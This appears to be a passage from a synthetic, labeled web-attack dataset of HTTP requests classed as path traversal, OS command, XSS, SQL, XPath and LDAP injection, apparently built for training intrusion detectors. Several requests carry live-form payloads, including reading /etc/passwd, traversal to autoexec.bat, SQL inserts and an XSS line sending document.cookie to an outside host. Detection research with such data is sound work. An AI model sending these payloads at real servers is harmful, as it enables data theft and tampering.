Accept-Encoding: identity;q=0.3
Accept-Language: *;q=0.0
Cache-Control: max-age=69898
Client-ip: 78.116.124.236
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="61"
Date: Sun, 23 Jul 06 08:26:13 CET
ETag: "HObdl7XhHCM3PbVXqLV"
Expect: 100-continue
From: os33et6k@EniiktZna.uk
If-Modified-Since: Thu, 15 Nov 07 17:26:46 UTC
If-Unmodified-Since: Tue, 23 Sep 08 10:38:43 CET
If-Match: "VUm7f@B3lEfMzZ1"
If-None-Match: *
If-Range: Wed, 20 Jul 05 16:13:02 GMT
Max-Forwards: 95
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: 9trc 8rehoi=lhgsh5
Authorization: NTLM NHNsaWRpbGV0dHJvbzY3a2E2bHRhcHQ4ZXllQ2VpcGF3
Range: 91-
Referer: /xenrnoe/ooHp/yseenn.cgi
TE: trailers,trailers,gzip
Trailer: Accept
User-Agent: feltg4
UA-CPU: StrongARM
UA-Disp: 601,1500,16
UA-Color: color32
UA-Pixels: 0990x1742
Via: FTP/5.2 33.31.52.42, 8.5 www.tdiachph.shtml, tebtFq/6.6 141.207.69.208
Transfer-Encoding: deflate
Upgrade: Iivqh/4.1, nEStsn/0.1, ocna/1.5, bea/5.8, n7i/2.7
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
X-Serial-Number: 33888894835
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35197
Start - Id: 45924
class: PathTransversal
GET /rhe9zvnhdswhr/tFzZv_7E/InWfeHcmdGFXY/I2gPwcopyZ_T1NMz/eso0T3leO62t/vXhavingKs.asp?eiIss=%5Cautoexec.bat&tS3lt=eE7e&tEr9ssi6=on&5CSdG=mr&heg2ofeeneSr=aesw&tamm=k6openet&cann=koimh4t5ce8u7x&sm=8exec HTTP/1.0
Host: www.A5mdutmtpf.gov
Connection: keep-alive
Accept: image/png;q=0.2, application/zip;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 81.172.25.192
Cookie: 2dnaFOeessxu0E=r4D-J1-Obmu@;Tldocumentv-kDbgsound@j=yu;nstyley;sEDl1eerpihn0=t8TN_
Cookie2: $Version="3"
Date: Mon, 17 Nov 08 24:00:41 UTC
ETag: "1MT.AVtNT_x-4Gm"
Expect: 100-continue
From: leat@aeegln9ow.cz
If-Modified-Since: Sat, 26 Dec 09 08:48:54 CET
If-Unmodified-Since: Fri, 23 Nov 07 04:04:26 UTC
If-Match: *
If-None-Match: "ZbHgGvpNTxCkWcx-"
If-Range: Tue, 29 Aug 06 09:38:11 GMT
Max-Forwards: 4
MIME-Version: 1.5
Pragma: si0p8=tstx9N
Proxy-Authorization: NTLM aGFhMWFwaHJtTmx0ckVuOGlpZWRucmFnZXMyTG0wM3QxRQ==
Authorization: Digest cnonce="amEepahy"
Range: 434-766527,-7
Referer: http://www.iterN.com/ge2NiPee/elexse3o/naas/Praohn.mpg
TE: chunked;q=0.6,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/6.7 (Machintosh; U; PPC 0.6; 0w-a2; rv:1.6.5) Gecko/34292599
UA-CPU: 68000
UA-Disp: 1794,840,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 880x5284
Via: 7.9 65.143.242.95
Transfer-Encoding: Afso; hr3yea=t1jia
Upgrade: dhvol/0.8, Pde/4.9
Warning: 039 www.rwdtitz.jpeg "i8opqaZazoijrn" "Fri, 21 Apr 06 07:33:49 UTC"
X-Forwarded-For: 210.181.84.191
X-Serial-Number: 715330032292
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45924
Start - Id: 43053
class: OsCommanding
PUT /gEi.KB/Y6Cinbodae4renAe0b/yntqauiou8/A1qMgx/seoz/tyYZAGT6vfbgu/evdk/vetcMNYHIWWOexec./rvO/veshiuo/aclescnoc5lerde/nBKZQGqyP-N.v.png? HTTP/1.0
Content-Length: 306
Content-Language: spaO,efsdJeah
Content-Encoding: deflate
Content-Location: /kratr/escusdis.conf
Content-MD5: c1Nnb3Q1bjJudWFyYWVyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Apr 10 16:30:08 UTC
Last-Modified: Thu, 21 May 09 14:01:29 UTC
Host: www.ysrmla.gov
Connection: close
Accept: */*
Accept-Charset: utf-8;q=0.5
Accept-Encoding: identity, deflate
Accept-Language: tdj1o-nae5d;q=0.8, Nfe6pth-taoaDe;q=0.4, tmiulo-n;q=0.3, wTxesyRm-atDn, hp5eef-f2oIo;q=0.8
Cache-Control: no-transform
Client-ip: 200.48.70.10
Cookie: atj5=987;4TcwycgihrNdsv=m;oiItcStcud=08869669
Cookie2: $Version="392"
Date: Fri, 23 Apr 04 19:39:43 GMT
ETag: "9_iNTBloZki0GevqWne"
Expect: 100-continue
From: oaHns@cadrMc1.ch
If-Modified-Since: Mon, 18 Aug 08 07:38:29 CET
If-Unmodified-Since: Sun, 30 Mar 08 18:38:01 GMT
If-Match: "xq-xA0QgKXNFJcwSct"
If-None-Match: *
If-Range: Fri, 07 Apr 06 12:26:30 CET
Max-Forwards: 6030
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: Digest algorithm=MD5
Range: -300480,70515-77810,-4510
Referer: http://www.ynpin.ch/5g6uTy/Ttcq/4iclsz/ldetuu/uyay.css
TE: gzip
Trailer: Connection
User-Agent: e2r6teeo/8.9.7.0
UA-CPU: 68000
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: HTTP/4.5 www.caoy.gif, FTP/4.3 147.211.117.246
Transfer-Encoding: deflate
Upgrade: tun3o/7.3, omna/4.0
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 121.83.206.9
X-Serial-Number: 4268812
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

es=0457&t4=wXXAdN&CplvmBAsnAeorOs=cat   /etc/passwd   |&Io5Y.s4Qebservices=302&u6MuB4Kslink=tMY00Z8&ewosm4es9aLsm=/su'&Slnatiyehc=vrtijAfEnsocahee&t8tfs1snji=t8znan3:tao&s5dwmr=473IMWvVpG&Yq8-I=6332&Vmimten=7wasop8ys4&isaiikjb0tr=ea &ndonytP=tdiin-gz%P/dwecue=Zd&hbaoleoafaopipo=eeNYHl@

End - Id: 43053
Start - Id: 47828
class: XSS
GET /ddur-EXck6dk/dmTeep4dlroieoryj/5kiwai/5.updatetNIfromI1d2eDc6/RWOOIG-p9h/WattoRe6rn0et/ls/imtl/hzhSwga/Hekockd9sq1e/yR6TevalrI.aspx?82ZL=ix&eo0athria0fos=6747127&dislw=79&uWCPF2J5Pl=fso&x-A4=k%3BTtnlfarhttpsmbpur&er2si45oiv=TDdvrknGdtnoaeied&tsoUqpodTnEz=lbDyXpW&uaemAsWtnR=06421&EtK@7jyuBW=a&a0dtywO7=javascript%3A++alert++++%28+++%22+++++i.3Sdg%22%29&abooitcetnxt=3739577&ailrdb5efsbgbe=+jw0fedeN HTTP/1.1
Host: www.O3rten.st
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.9, cp-950;q=0.8
Accept-Encoding: deflate;q=0.2, identity;q=0.2, deflate, gzip;q=0.0, gzip;q=0.7
Accept-Language: w-0;q=0.7, Fme-tEJEroea, 34tyxrr-l;q=0.6
Cache-Control: max-stale
Client-ip: 106.65.144.196
Cookie: dmMs4=ydrophduTsylts1\g;iieItinrdtohds=sene;lM=615410;ssigotaocae9=naa
Cookie2: $Version="71"
Date: Fri, 11 Dec 09 19:38:14 CET
ETag: W/"OurwtpibD7A0noXC"
Expect: 9uzxe
From: easla@ssNseiT.it
If-Modified-Since: Tue, 20 Dec 05 02:48:13 CET
If-Unmodified-Since: Fri, 08 Dec 06 24:56:16 GMT
If-Match: "Hhh@qIhf8nia.DsVqUWI"
If-None-Match: "m1JK9pR8yar7L562uPv8"
If-Range: Sun, 05 Apr 09 17:10:34 CET
Max-Forwards: 0025
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: ae9de sesszy=lt9eEk7
Authorization: Basic eW91c2VpZTp0bnh2dGQycw==
Range: 44-,80-
Referer: http://www.rlLhhhar.de/hooiotb/art9/eNkwifa/yio5s.swf
TE: deflate,chunked,trailers
Trailer: TE
User-Agent: venstllCn (d1UE_cR; aMafbfx0t)
UA-CPU: MIPS
UA-Disp: 162,931,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 907x206
Via: HTTP/5.8 www.Bjtkamn.css
Transfer-Encoding: identity
Upgrade: liEh/2.4, ahen5/4.1
Warning: 325 81.170.42.32 "7FeeyLne7hiEmT" "Mon, 30 Nov 09 23:36:47 GMT"
X-Forwarded-For: 240.35.1.196
X-Serial-Number: 9590934365378
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47828
Start - Id: 41362
class: SqlInjection
PUT /o.Cx/rV3pvCzMDZtU/5yhwmndn0ott/6ToZDkZbody._J/25umW/FkekArU/erx/yJUp/O6xFU7BeHs/vpHsNOn71H3Vy63.nsf? HTTP/1.1
Content-Length: 412
Content-Language: j0soy0s,b2Eens,ad
Content-Encoding: deflate
Content-Location: /njarmE3t.swf
Content-MD5: c2Z0d3JvOXZlZWxlQW5zcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Apr 09 05:37:39 CET
Last-Modified: Sat, 19 Apr 08 02:17:11 GMT
Host: 125.76.191.5:0951
Connection: close
Accept: image/gif, audio/basic, video/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: e-rbzick, tlwdst-own5tsvo;q=0.1, O-5set, ai-g3teilb, lttjeot-noe;q=0.3
Cache-Control: no-store
Client-ip: 200.4.215.226
Cookie: nsndfebcapi=01517941;RQI.=nhicognnsa
Cookie2: $Version="6"
Date: Sun, 21 Jan 07 10:50:10 GMT
ETag: W/"J_IZ-Sru.NlxdAHqGD"
Expect: 100-continue
If-Modified-Since: Sun, 05 Sep 04 23:00:03 CET
If-Unmodified-Since: Wed, 14 Sep 05 21:24:23 CET
If-Match: "SWFru0JFVzrFD92"
If-None-Match: *
If-Range: "RNv@t1doaOCA6mlkV4U"
Max-Forwards: 8818
MIME-Version: 3.6
Pragma: lg5=n
Proxy-Authorization: igutn jqasn=dbnaa9
Authorization: slrj iSieor=iOaoa
Referer: http://www.ba3omv.fr/eroEAr/7toadid.msf
TE: trailers
User-Agent: cc5at1qas
UA-Disp: 557,1073,8
UA-OS: Windows 98
Via: FTP/6.9 www.dhxTd.js, HTTP/6.5 246.2.104.227, FTP/5.5 www.seat7ec.css
Transfer-Encoding: identity
Upgrade: nhetgd/3.9
Warning: 522 63.253.58.196 "esHrot6irna" 
X-Serial-Number: 309660
----: ------------------------------------

ojs2lNa=rfx&rNg0processing-instructionxePEOqN=';    insert     into     wtapsuT5  values(666,'lmEdobu','aeered',0xfffff)&kOehel0dtelernm=sTteooreeq&wtej=b?o&lioWtow=r1Ud&ntazsa7lHoasKc4=txe2cdMusAg&8DVE@kzieIps=mguseT&neo5neysi5py= 4Zw&DskefdetStreo=EHausbnetcatt6&dsseu=80951&cdguso=shodunion e4qcmhesy&wlshmguotrilut=wsperlzL5vreplaceate-i&mapE=eispyinclude e&leIwu4dsyflSdet=deihtacces

End - Id: 41362
Start - Id: 46852
class: XSS
PUT /.Dzd0.js? HTTP/1.1
Content-Length: 218
Content-Language: inmmbht
Content-Encoding: compress
Content-Location: /vycredrs/eseitw.jpg
Content-MD5: bWxhc2Fhc2dzd3RybmVldQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 20 Dec 08 23:37:27 CET
Last-Modified: Fri, 14 Sep 07 24:03:33 GMT
Host: 168.100.138.32:2
Connection: keep-alive
Accept: audio/*;q=0.5
Accept-Charset: euc-jp, iso-8859-5, big5;q=0.7, x-mac-korean;q=0.7
Accept-Encoding: compress;q=0.6, gzip;q=0.5
Accept-Language: xlep-vismy;q=0.0, E-lApb5es;q=0.0, ttUt-z;q=0.4, atr-sla;q=0.1, do-salGena;q=0.3
Cache-Control: au=eNAthsbv
Client-ip: 116.169.8.10
Cookie: eeTi2ounstrotO=2144;2x86=Oeune %usncmisr;topeslsret=u
Cookie2: $Version="455"
Date: Thu, 24 Aug 06 20:37:00 GMT
ETag: "HTJvF.2qTzNngibZ14mg"
Expect: eounOo
From: eisopAa@s6qldnnaej.be
If-Modified-Since: Fri, 30 Jun 06 08:08:30 UTC
If-Unmodified-Since: Tue, 29 Jan 08 19:51:14 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 458
MIME-Version: 2.6
Pragma: kswl='m6Uenf'
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: NTLM dHRyeWVzdTdvaXZoaWdoeDZzaG9odDNoZHRldXRzaWVlc2V0b2xk
Range: 11334-,-933
Referer: http://www.oTlypy.org/lsLxv/yemi.cgi
TE: gzip,trailers
Trailer: Referer
User-Agent: 4eeh/0.4.1.0.7
UA-CPU: x86
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 758x384
Via: 3.1 www.vrdrda.html, 5.0 www.rtdH5A.html:7
Transfer-Encoding: gzip
Upgrade: ccSen/7.1
Warning: 762 95.205.191.87 "fohr1e" "Mon, 03 Aug 09 24:53:41 UTC"
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vnh8nsft2=8sisi&tcsetRgvRgne=88344044&eeooautvmlss=3723169&8kd=<script  >alert    (hdd3nn3s6bned.ryAis)</script   >&iuGcbhavingF=iewq5W&Itsu3=netcatkn&9wheregpQDG=5703&4irdt7w9Aoote3=olRwtl7mail&enflor=0e

End - Id: 46852
Start - Id: 35717
class: XPathInjection
GET /mSN1/fLnb66DdbrE/1HG@KWW9fP-/ov5e0@B/ir1u/kl4RhWW9UF-2Zreplace/bohvsdESnr0DrBtrt/getd1orAz.nsf?nte=bhso%27+++++or+++6++%3C++++count%28path%2Fchild%3A%3A*%29+++++or++++%27relf8%27+++%3D+%27&x9gIr=083&t97iel=7nttketteu+r7oi HTTP/1.1
Host: www.a3lsxittde.de
Connection: close
Accept: audio/*, text/*
Accept-Charset: x-mac-chinesetrad, iso-2022-kr;q=0.0, cp-932;q=0.3, x-mac-korean
Accept-Encoding: *;q=0.7
Accept-Language: ehow7in-ee2e;q=0.3, u-4yt;q=0.8, ewap-ra;q=0.9
Cache-Control: no-transform
Client-ip: 77.125.12.174
Cookie: suctdehsisY=9o= 
Cookie2: $Version="9"
Date: Sat, 17 Apr 04 18:36:01 CET
ETag: W/"mZF-ns0Ok3629vIwy"
Expect: 100-continue
From: p1tia@Pqapltwu.it
If-Modified-Since: Wed, 08 Apr 09 03:58:16 UTC
If-Unmodified-Since: Sat, 18 Apr 09 09:39:41 CET
If-Match: *
If-None-Match: "6T.17L64ixue@dU4Tud"
If-Range: Sun, 01 Feb 09 04:20:41 UTC
Max-Forwards: 34
MIME-Version: 8.0
Pragma: noDSneiR=en
Proxy-Authorization: Basic ZXllYTc6dHNuMA==
Authorization: NTLM aXg5bm5mbmVyc2hlOWV3aGh0bDI2YmNPaWJ1ZW9ycHlybmUybmVoaWhlbm9oYQ==
Range: 5225-,8-9,1-
Referer: http://www.aindtan.ch/asdo/eooen/wbnrb4p/s5snn/r1ni33ob.asp
TE: chunked;q=0.9,chunked
Trailer: TE
User-Agent: ioetagwh9stjtfoSnt
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x6887
Via: HTTP/5.9 www.0rwrNh.jpg:7, yude/2.0 10.38.47.102:78
Transfer-Encoding: compress
Upgrade: d3ec/2.6, tifat/9.6
Warning: 550 www.hfiueaes.shtml "mhtjtnssennQ8" "Fri, 14 Nov 08 07:02:27 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35717
Start - Id: 38580
class: LdapInjection
GET /5U39L/r@FtB.p/esthnesthI/rnteo9skTe/6.N1qGzMsddbQy/3sA2CD-W2xS7dj/tfpnleersD2R3tM7esDa/Madmin3gc6/ewreCcgOstoete3/oS_@j3eIML7AFeypDYQ./bXmX@A.msf?ieaaToi=31452339&ibpaXedaaLee7m=oFzpP-U8u&o0o1ledtiumdsit=eonskemsliiubocadt&sjvnplC7alDr=771005858&iElr=4975&ohddhteceifTlre=taPhF&nNlhEioeOlik=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&iiuhd2inkyhm=kwhere&aw=dueeabtpol9Muor3&XWFHs0wp-y1cBp=fEL&UhRyC=4s3tuedp5ieWidnel&ysu=7301&fharmdpvrcgs=%3F%29n%25u&wnccnrda=44 HTTP/1.1
Host: www.russlm.biz
Connection: hqyiIacT
Accept: */*;q=0.4
Accept-Charset: euc-kr, iso-2022-jp, hz-gb-2312;q=0.9, isiri-3342;q=0.4, us-ascii
Accept-Encoding: *;q=0.0
Accept-Language: *
Cache-Control: min-fresh=049
Client-ip: 231.216.109.79
Cookie: rK1R=68z04H-eW;diuhtxemw6AtaHu=sm;zQjl-=tr8qrrlh;iwayjpnnewlllo=91
Cookie2: $Version="6"
Date: Wed, 13 Dec 06 18:48:54 CET
ETag: W/"INs.rY_u52VqhZ3fN"
Expect: 4zroesox
From: sntdhp@rvsirrEwfi.it
If-Modified-Since: Sun, 26 Mar 06 18:12:33 CET
If-Unmodified-Since: Sat, 03 Apr 10 02:00:47 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 02 Jun 06 20:22:44 UTC
Max-Forwards: 4753
MIME-Version: 6.9
Pragma: 8='nesf'
Proxy-Authorization: Digest nc=862e2FDb
Authorization: Digest opaque="rseh"
Range: -5
Referer: http://E9eirdid.com/yr3e7h/thGeo/rsyndldi/ioire.fgf
TE: trailers,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: Mozilla/6.8 (X11; U; Linux i386 8.9; Si-en; rv:4.2.1) Gecko/48149244
UA-CPU: PowerPC
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7804x6342
Via: FTP/6.1 112.195.132.111:64659
Transfer-Encoding: sTWCa; 9io8=RelT
Upgrade: ksu/7.2, ear/3.1
Warning: 767 180.228.227.71 "tniR" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38580
Start - Id: 44707
class: PathTransversal
POST /ctioex9e5chnNmvroces/gPWZsSQthcP/te.tiff? HTTP/1.0
Content-Length: 170
Content-Language: qtlpztH,T
Content-Encoding: gzip
Content-Location: http://www.trn3l.uk/hhekoaU/4e0s5a1o/Eeoes.mdb
Content-MD5: RWxudG81b3RzbXlubnN0RQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Jan 04 12:02:29 GMT
Last-Modified: Thu, 03 Jul 08 05:06:59 UTC
Host: www.ghhnest12s.gov
Connection: rtgmand
Accept: */*;q=0.6
Accept-Charset: koi8, iso-8859-6, iso-8859-5;q=0.7
Accept-Encoding: identity;q=0.0
Accept-Language: sReih-yoacdug4, e-p, umhoger-dpd
Cache-Control: no-store
Client-ip: 159.172.8.1
Cookie: Iscvseei5l=9153;Escetws2tha=1u9fr<imglaenr
Cookie2: $Version="933"
Date: Fri, 08 Jun 07 15:08:46 UTC
ETag: W/"hjmo.mq35@-BHmp9g"
Expect: 100-continue
From: ohoe@b9a8.de
If-Modified-Since: Fri, 20 Jun 08 24:26:02 CET
If-Unmodified-Since: Thu, 21 Dec 06 02:56:18 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 20 Aug 05 17:34:56 UTC
Max-Forwards: 0
MIME-Version: 4.6
Pragma: oAene=tgi9
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: Basic TmFycjowR3RZaA==
Range: 8542-,-709
Referer: /eqlirr/rgnd/ewao/ohAoArbO.msf
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: ijtnt (hIZ9A2e; i3Y7VO-d; ro_4yRe; uC0nproQlW)
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0076x674
Via: FTP/3.1 www.aNes.tiff, fraa/8.9 178.36.234.229
Transfer-Encoding: identity
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 857 185.30.26.113 "mesibeEtevaqn" "Sun, 20 Apr 08 19:11:08 GMT"
X-Forwarded-For: 37.2.49.250
X-Serial-Number: 145776
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~

oOaiasXn4rcN=doc(file:///c:/hr/Lrw5pi.xml )&Gb1P6=3493639&er5Imze0fiNm=558&ZW1qW58=xp_LNd&tk87fsti9f=Uey&sweswcaTM60u0rg=t he&DOiueam1ineti=lsonetcat=

End - Id: 44707
Start - Id: 42649
class: SqlInjection
GET /isnrbtocmrrTdhab/cGQ/Q-OZ.4S/bXbm6xmVUVFyPR7.pl?cmlzeoeshhnxTr=ef&hizTtucSas=%27%3B++insert+++++into+++++efiv+++values%28666%2C%27deGnze%27%2C%27tpatrb%27%2C0xfffff%29 HTTP/1.0
Host: www.s6ucnxer7.de
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: iso-8859-15, windows-1258;q=0.3
Accept-Encoding: deflate;q=0.7, deflate;q=0.6, compress;q=0.7, compress;q=0.2, gzip
Accept-Language: utn-itw;q=0.7, fa-amiqbrs;q=0.2, cxmanfn-8ectw;q=0.5, heorlao-sistd2Q, roate-a2ea;q=0.3
Cache-Control: no-cache
Client-ip: 183.138.44.237
Cookie: riiTeAb=laelts;9YM7Y-voZ=201;l0ol=isKmxX
Cookie2: $Version="2"
Date: Fri, 24 Apr 09 23:44:51 CET
ETag: W/"d99n_-k.LjOX0-pI"
Expect: 100-continue
From: z74ht@xqb9ivEose.gov
If-Modified-Since: Tue, 31 Aug 04 04:57:49 GMT
If-Unmodified-Since: Sun, 22 Feb 04 15:33:12 UTC
If-Match: *
If-None-Match: *
If-Range: "IEn8juBMUOS2xQRK"
Max-Forwards: 764
MIME-Version: 3.2
Pragma: eWrw='as'
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: Digest nonce
Range: -5
Referer: /toEtM/pEnrolds.bin
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.9 (Machintosh; U; Mac OS X 3.0; ms-sn; rv:2.5.7) Gecko/73401237
UA-CPU: PowerPC
UA-Disp: 0660,7144,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: HTTP/4.6 www.tdmz.tiff, 7.2 www.1yntgg.png, FTP/2.8 www.d7rtnh.htm
Transfer-Encoding: gzip
Upgrade: eyy/2.8, zqo/4.6, tfea/5.6, tnwsfs/8.5, Iut/4.9
Warning: 577 221.133.112.12 "Eaaers" 
X-Forwarded-For: 251.163.13.200
X-Serial-Number: 81024686129
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42649
Start - Id: 37746
class: LdapInjection
GET /tcY-@Rey_U29olq1/n6rvjx/Twmowt0fstI/aoNmrmivln8/nn/2BJtOhttp6.sh?dC6F4tkJAHX=96981451&ih=dst0&-aE1dxaI7U=%24n%5C&.8itqwinntfEJygR=ig0d%3FsPEoi%2Boe1tE&dIyAecaesaroe=%29%28++++%7C+%28mo%3Dohahn*%29&gaOhtkme3ehca0m=6340939&3hndosenSMts=ee9Pso4tdOhao&otsaaooivrtSi=77991&6bktGraescesn=lkcndN&i6stherh=vbNemeoon&8tG=28917 HTTP/1.1
Host: 237.49.136.141
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 214.57.144.226
Cookie: fhijkeolg=o rom;rintirnn=1;ch9tlleectyue=anrpp
Cookie2: $Version="98"
Date: Sun, 22 Feb 09 06:47:40 GMT
ETag: W/"6L-X_u4z8Jt7prV8D"
Expect: 100-continue
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Sun, 07 May 06 02:23:23 CET
If-Unmodified-Since: Fri, 18 Nov 05 08:32:16 UTC
If-Match: *
If-None-Match: "LxGAl68DV4gusbfD_vE"
If-Range: *
Max-Forwards: 147
Pragma: no-cache
Authorization: NTLM dW1jdWFvZTVpeDN0bml0aUR1dHJ1bmRTaUl0dGxoZW9hcnJzMmd1cHJlbTVzZHA=
Range: 87-4317
Referer: http://www.bzir.fr/6afaiif/Etyeii/sekyeaqc/tarDfhoe/7tri.mp3
Trailer: Pragma
User-Agent: Mozilla/4.4 (Windows; U; Win 9x 7.4; le-ai; rv:2.7.3) Gecko/21106617
UA-CPU: MIPS
UA-Disp: 242,7372,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 842x443
Via: 6.2 76.136.109.186
Transfer-Encoding: eahW
Upgrade: esS/4.5, qssn/5.3, wig/2.0
Warning: 397 www.estmthgu.jpeg "iqcdxmusey4i3" 
X-Forwarded-For: 33.253.224.201
X-Serial-Number: 3350612
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37746
Start - Id: 47067
class: XSS
GET /SeaatanEi/oirT0o/aonemSsisStacteii/h3T56D/gQMl-gMOOLW52F/sB6Wdde/teseboe80g/arohspso6dyT2v0tvn/nqesfyHtVrt.asmx?Fj7ercme=098339&dztaaa=systemn%24jt&saearro=%3C%21%5BCDATA%5B%3C%21--%5D%5D%3E%3Cscript++++%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.llta.com%2Fcgi-bin%2Feronoron.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript+%3E&hhkoleE=24&ed70fdeiapaowvo=dsvUz&OUDB=6566865 HTTP/1.1
Host: 45.97.73.49:071
Connection: qtoto
Accept: video/quicktime;q=0.7, application/rtf, text/xml;q=0.0
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iustoe-u5f
Cache-Control: no-transform
Client-ip: 217.116.65.138
Cookie: nfnsA=wgetfrommochav;0firetiionta= uelhy 8 ypBr;ienR=lorehioe1e
Cookie2: $Version="5"
Date: Wed, 17 Nov 04 20:24:58 CET
ETag: "fY51yrSHaJA_rGougg2c"
Expect: 100-continue
From: l5ga@0acwrnnsyp.biz
If-Modified-Since: Mon, 05 Jul 04 17:00:23 UTC
If-Unmodified-Since: Tue, 12 Feb 08 14:22:48 CET
If-Match: *
If-None-Match: "4ebNioKQYXimVkfFU"
If-Range: *
Max-Forwards: 3
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: NTLM dGJ0b2VjdDBhdG1zb3V5dGx1b2V1aWJzc0s2MXpobmliYXRoZWVpbw==
Authorization: Digest cnonce="p0oa"
Range: 42191-21573,0-729,-0
Referer: http://www.yen1st.biz/eddCt/TbtLc4e/1ueiri/leEAusti.jsp
TE: trailers,gzip;q=0.4,deflate;q=0.1
Trailer: Via
User-Agent: Mozilla/9.0 (Windows; U; Win98 6.3; ri-ut; rv:9.4.1) Gecko/32945865
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 987x1282
Via: 7.4 207.240.198.26
Transfer-Encoding: identity
Upgrade: cilvd/3.4
Warning: 889 109.167.98.103 "ceSomrehteyFeh" "Sat, 20 Jan 07 24:44:38 UTC"
X-Forwarded-For: 240.93.48.210
X-Serial-Number: 9140776636485
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47067
Start - Id: 45504
class: PathTransversal
GET /bTQs.php3?eui=uSFCd&assmsTol8d=..%2F..%2F..%2FWINNT%2Fautoexec.bat&metaUAI@60=0997564&as0ctIEtUdrt4=41 HTTP/1.0
Host: www.5yhoIl9o.de
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: v-ekjatxSs, sY-v2shElne, h-iEEetdt
Cache-Control: min-fresh=3345
Client-ip: 136.132.185.114
Cookie: 9laO=38295845;4poTdfelbmsi=adnscriptde)o
Cookie2: $Version="34"
Date: Mon, 30 Mar 09 05:43:40 GMT
ETag: W/"8s6NLnMvF3qQwwHgq_w"
Expect: 100-continue
From: tetsj@adnocr.uk
If-Modified-Since: Tue, 05 Jul 05 10:26:01 GMT
If-Unmodified-Since: Tue, 17 Feb 09 24:15:32 GMT
If-Match: *
If-None-Match: "3X65fxKnxeYPp5ve5JV"
If-Range: Thu, 04 Mar 04 09:36:04 GMT
Max-Forwards: 2239
MIME-Version: 4.8
Pragma: iieodQo='wgtedbsh'
Proxy-Authorization: Digest uri=http://nSq4bc.st/8wTssE.msf
Authorization: 0sdfe untLe=iocYnPo
Range: 354-,63882-
Referer: http://shEeent.com/aaozole.sh
TE: trailers,trailers
Trailer: Upgrade
User-Agent: laeECpethGosnnos
UA-CPU: MIPS
UA-Disp: 970,9844,8
UA-OS: Win98
UA-Color: color16
